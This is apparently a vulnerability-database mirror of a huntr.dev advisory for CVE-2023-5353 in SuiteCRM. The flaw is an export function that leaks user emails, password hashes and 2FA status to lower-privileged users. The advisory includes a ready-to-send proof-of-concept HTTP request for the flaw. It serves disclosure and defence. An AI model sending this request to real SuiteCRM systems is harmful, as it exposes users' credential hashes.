Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrIllume-security3B3BB4F1-1AEA-4134-99EB-157F245FA752
HistoryAug 16, 2023 - 9:41 a.m.

Insufficient access control in the export functionality for the 'Groups' module exposing user password hashes

2023-08-1609:41:26
illume-security
www.huntr.dev
13
access control
export functionality
data exposure
user password hashes
sensitive information
web application
request exploitation
version 8.3
version 7.12.9
version 7.13.4
module enumeration

EPSS

0.001

Percentile

23.8%

JSON

Description

The web application incorrectly returns sensitive data to authenticated lower privileged users when making requests to export data from the ‘Groups’ module. This includes information such as the user’s email address, password hash and whether two-factor authentication is configured.

Proof of Concept

To export sensitive information for all users on the application, the following request could be sent (version 8.3):

POST /legacy/index.php?entryPoint=export HTTP/1.1
Host: [APPLICATION_HOSTNAME]
Cookie: EmailGridWidths=0=10&1=10&2=150&3=250&4=175&5=125; ck_login_language_20=en_us; sugar_user_theme=suite8; sugar_user_theme=SuiteP; ck_login_id_20=2ed13b79-8c22-0f61-9511-64d0d6214ce7; ck_login_language_20=en_us; LEGACYSESSID=o67um0uqlvvbq090cq47ed84vi; PHPSESSID=ec351p8sg0sf51as5grrvc66kn; XSRF-TOKEN=8IkPTqHry3UFRIx_Sk47HIS2hnLvwvVr5jp_UVm79To; ck_login_id_20=f0950665-7c37-520f-9b61-64d2066e623e
Content-Length: 26
Cache-Control: max-age=0
Sec-Ch-Ua: 
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: [APPLICATION_HOSTNAME]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

module=Groups&action=index

The attack can be exploited on versions 7.12.9 and 7.13.4by sending the request to /index.php?entryPoint=export instead.

The native intension of this functionality appears to be allowing users to export data from tables based on the module page they’re viewing. The testing team enumerated all of the modules present in the application and began sending a series of requests to export data whilst changing the value of the module parameter to each module previously identified. From our testing, it appears only the Groups modules returns overly permissive data.

Related

osv 2
prion 1
cve 1
vulnrichment 1
nvd 1
cvelist 1
osv
osv
CVE-2023-5353
2023-10-03 13:15:11
BIT-suitecrm-2023-5353
2024-03-06 11:06:47
prion
prion
Improper access control
2023-10-03 13:15:00
cve
cve
CVE-2023-5353
2023-10-03 13:15:11
vulnrichment
vulnrichment
CVE-2023-5353 Improper Access Control in salesagility/suitecrm
2023-10-03 12:15:20
nvd
nvd
CVE-2023-5353
2023-10-03 13:15:11
cvelist
cvelist
CVE-2023-5353 Improper Access Control in salesagility/suitecrm
2023-10-03 12:15:20

EPSS

0.001

Percentile

23.8%

JSON
Related for 3B3BB4F1-1AEA-4134-99EB-157F245FA752
osv2prion1cve1vulnrichment1nvd1cvelist1